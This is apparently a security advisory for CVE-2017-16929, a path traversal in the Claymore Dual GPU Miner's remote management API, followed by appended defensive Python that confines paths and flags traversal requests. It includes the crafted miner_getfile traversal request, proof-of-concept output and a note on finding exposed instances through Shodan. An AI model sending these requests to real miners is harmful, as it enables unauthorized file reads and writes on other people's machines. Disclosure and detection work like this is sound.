VuNote
===================

Author: <github.com/tintinweb>
Ref: https://github.com/tintinweb/pub/tree/master/pocs/cve-2017-16929
Version: 0.2
Date: Nov 30th, 2017

Tag: claymore dual ethereum decred crypto currency miner

Overview
--------

Name: Claymore's Dual ETH + DCR/SC/LBC/PASC GPU Miner
Vendor: nanopool/claymore
References:
* https://github.com/nanopool/Claymore-Dual-Miner
* https://bitcointalk.org/index.php?topic=1433925.0
Version: 10.1 [2]
Latest Version: 10.1 [2]
Other Versions: <= 10.1
Platform(s): windows, linux
Technology: C/C++
Vuln Classes: CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Origin: remote
Min. Privs.: authenticated
Source: Closed; runtime protection mechanisms
CVE: CVE-2017-16929

Description
-----------

A specialized mining solution with a remote management interface for mining ethereum / decred / siacoin / LBRY Credits / pascal coin.

quote website [1][2]

- Supports new "dual mining" mode: mining both Ethereum and Decred/Siacoin/Lbry/Pascal at the same time, with no impact on Ethereum mining speed. Ethereum-only mining mode is supported as well.
- Effective Ethereum mining speed is higher by 3-5% because of a completely different miner code - much less invalid and outdated shares, higher GPU load, optimized OpenCL code, optimized assembler kernels.
- Supports both AMD and nVidia cards, even mixed.
- No DAG files.
- Supports all Stratum versions for Ethereum: can be used directly without any proxies with all pools that support eth-proxy, qtminer or miner-proxy.
- Supports Ethereum and Siacoin solo mining.
- Supports both HTTP and Stratum for Decred.
- Supports both HTTP and Stratum for Siacoin. Note: not all Stratum versions are supported currently for Siacoin.
- Supports Stratum for Lbry and Pascal.
- Supports failover.
- Displays detailed mining information and hashrate for every card.
- Supports remote monitoring and management.
- Supports GPU selection, built-in GPU overclocking features and temperature management.
- Supports Ethereum forks (Expanse, etc).
- Windows and Linux versions.

Summary
-------

> "FOMO driven security blindness."

The remote management interface of the Claymore Dual GPU miner 10.1 is vulnerable to an authenticated relative directory traversal. It is exploited by issuing a specially crafted remote management request and allows a remote attacker to read/write arbitrary files, because the file path supplied in the request is neither validated nor sanitized.

* API calls
  * miner_getfile (read) ... read any file
  * miner_file (write) ... write any file

conditions:

* authenticated
* write: *not* in readonly mode

Successful exploitation would allow an authenticated user to read/write arbitrary files (with the permissions of the miner process).

See attached PoC.

Details
-------

Service Discovery:

* shodan: 'eth result' lists about 170-240 publicly available instances [3] with significant hash power
* banner:

```html
<html><body bgcolor="#000000" style="font-family: monospace;">{"result": ["10.1 - ETH", "4286", "149336;7492;0", "30620;29877;28285;30605;29946", "0;0;0", "off;off;off;off;off", "62;65;51;64;61;75;51;67;62;72", "eth-us-east1.nanopool.org:9999", "0;1;0;0"]}<br><br><font color="#ff0000">Remote management: read-only mode, command miner_file ignored</font><br><font color="#00ff00">ETH: 11/22/17-15:28:38 - SHARE FOUND - (GPU 3)....
```

Remote Management API overview:

```json
# >nc -L -p 3333
{"id":0,"jsonrpc":"2.0","method":"miner_getstat1"}
{"id":0,"jsonrpc":"2.0","method":"miner_file","params":["epools.txt","<encoded>"]}
{"id":0,"jsonrpc":"2.0","method":"miner_getfile","params":["config.txt"]}
{"id":0,"jsonrpc":"2.0","method":"miner_restart"}
{"id":0,"jsonrpc":"2.0","method":"miner_reboot"}
{"id":0,"jsonrpc":"2.0","method":"control_gpu","params":["0", "1"]}
{"id":0,"jsonrpc":"2.0","method":"control_gpu","params":["-1", "0"]}
{"id":0,"jsonrpc":"2.0","method":"control_gpu","params":["0", "2"]}
{"id":0,"jsonrpc":"2.0","method":"miner_file","params":["config.txt","<encoded>"]}
{"id":0,"jsonrpc":"2.0","method":"miner_file","params":["dpools.txt","<encoded>"]}
```

Directory Traversal:

* `miner_file` and `miner_getfile`

Neither command appears to sanitize the provided path in any way, which allows relative path traversal.

```python
# Vector: traversal
# Description: path traversal
# Result: retrieves any file
"traversal": {"id":0, "jsonrpc":"2.0", "method":"miner_getfile", "params":["../Claymore.s.Dual.Ethereum.Decred_Siacoin_Lbry_Pascal.AMD.NVIDIA.GPU.Miner.v10.0/config.txt"]}, ##<<-- path traversal
```

// see PoC vector: traversal

See attached PoC.

Proof of Concept
----------------

Prerequisites:

* compatible AMD/NVidia hardware

1. start the miner in read/write mode with no password set, for testing

```
#> EthDcrMiner64.exe -epool http://192.168.0.1:8545 -mport 3333 ...
```

2. run poc.py --vector=traversal <target> (we expect EthDcrMiner64.exe to be placed in a directory called `/Claymore.s.Dual.Ethereum.Decred_Siacoin_Lbry_Pascal.AMD.NVIDIA.GPU.Miner.v10.0`)

```
[poc.py - <module>() ][ INFO] --start--
[poc.py - <module>() ][ INFO] # Claymore's Dual ETH + DCR/SC/LBC/PASC GPU Miner - Remote Buffer Overwrite
[poc.py - <module>() ][ INFO] # github.com/tintinweb
[poc.py - iter_targets() ][ WARNING] shodan apikey missing! shodan support disabled.
[poc.py - <module>() ][ INFO] [i] Target: 127.0.0.1:3333
[poc.py - <module>() ][ INFO] [+] connected.
[poc.py - <module>() ][ DEBUG] <-- 1048 '{"id": 0, "error": null, "result": ["../Claymore.s.Dual.Ethereum.Decred_Siacoin_Lbry_Pascal.AMD.NVIDIA.GPU.Miner.v10.0/config.txt", "<encoded file data>"]}'
[poc.py - <module>() ][ INFO] --done--
```

3. EthDcrMiner returned the file's content, as shown in the miner's own log:

```
...
DCR: 11/22/17-22:56:06 - New job from pasc-eu2.nanopool.org:15555
Remote management: file ..\Claymore.s.Dual.Ethereum.Decred_Siacoin_Lbry_Pascal.AMD.NVIDIA.GPU.Miner.v10.0\config.txt was uploaded
DCR: 11/22/17-22:56:16 - New job from pasc-eu2.nanopool.org:15555
...
```

Patch
-----

n/A - closed source :/

Notes
-----

* Timeline
  * 11/22/2017 - vendor contact: report sent
  * 11/23/2017 - vendor response: fixed version 10.2 ready and publicly available; request for 7+ day embargo

    vendor statement:

    > The root cause is that remote management was designed to be used in local network only. But some "smart" people want to share ports to everyone and then catch problems. I will close the issues you found, but attacker will be able to do something bad anyway, at least execute ddos to prevent remote management work as expected.

  * 12/04/2017 - public disclosure

* Vendor Changelog

  Latest version is v10.2:
  - fixed critical issues in remote management feature (attacker could crash miner even in read-only mode).
  - now miner supports up to #299 epoch.
  - in rare cases ADL API calls can hang, now watchdog checks it as well.
  - improved "-minspeed" option, check readme for details.
  - added "miner_getstat2" command to remote management, check "API.txt" for details.
  - EthMan: added detailed stats mode in main window.
  - a few minor improvements in both miner and EthMan.

* Runtime Protection

```
* Linux: packer / just compression
  * gdb
* Windows: protector / anti-debug, vmprotect?
  * x64dbg: DbgUiRemoteBreakin <- RET
```
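The path confinement the advisory says `miner_getfile`/`miner_file` lack, plus a classifier a defender can run over requests captured on the management port. This is an added example, not tintinweb's poc.py and not vendor code; the base directory `/opt/claymore`, the function names and the sample request lines are constructed for illustration.

```python
import json
import os

# Management commands whose first parameter is a file path (see API overview).
FILE_COMMANDS = {"miner_getfile", "miner_file"}

def resolve_confined(base_dir, requested):
    """Canonical path of `requested` if it stays inside `base_dir`, else None.
    Backslashes are normalised because the miner also runs on Windows (the log
    above shows '..\\...\\config.txt'); absolute and drive-prefixed paths fail."""
    normalised = requested.replace("\\", "/")
    if not normalised or normalised.startswith("/") or ":" in normalised:
        return None
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, normalised))
    try:
        inside = os.path.commonpath([base, candidate]) == base
    except ValueError:  # different drives on Windows
        inside = False
    return candidate if inside and candidate != base else None

def classify_request(line, base_dir):
    """'ok' (file command confined to base_dir), 'traversal' (file command
    escaping it) or 'other' (non-file command or unparsable input)."""
    try:
        req = json.loads(line)
    except ValueError:
        return "other"
    if not isinstance(req, dict) or req.get("method") not in FILE_COMMANDS:
        return "other"
    params = req.get("params") or []
    if not params or not isinstance(params[0], str):
        return "other"
    return "ok" if resolve_confined(base_dir, params[0]) else "traversal"

def flagged_paths(lines, base_dir):
    """Paths of every file request in `lines` that escapes `base_dir`."""
    return [json.loads(l)["params"][0] for l in lines
            if classify_request(l, base_dir) == "traversal"]

# Constructed sample: benign requests from the API overview plus the
# advisory's traversal vector, as they would arrive on TCP/3333.
SAMPLE_REQUESTS = [
    '{"id":0,"jsonrpc":"2.0","method":"miner_getstat1"}',
    '{"id":0,"jsonrpc":"2.0","method":"miner_file","params":["epools.txt","<encoded>"]}',
    '{"id":0,"jsonrpc":"2.0","method":"miner_getfile","params":["config.txt"]}',
    '{"id":0,"jsonrpc":"2.0","method":"miner_getfile","params":'
    '["../Claymore.s.Dual.Ethereum.Decred_Siacoin_Lbry_Pascal.AMD.NVIDIA.GPU.Miner.v10.0/config.txt"]}',
]
```

`resolve_confined` resolves symlinks and `..` before comparing against the base directory, so `sub/../config.txt` is accepted while `../<dir>/config.txt` and its backslash variant are rejected.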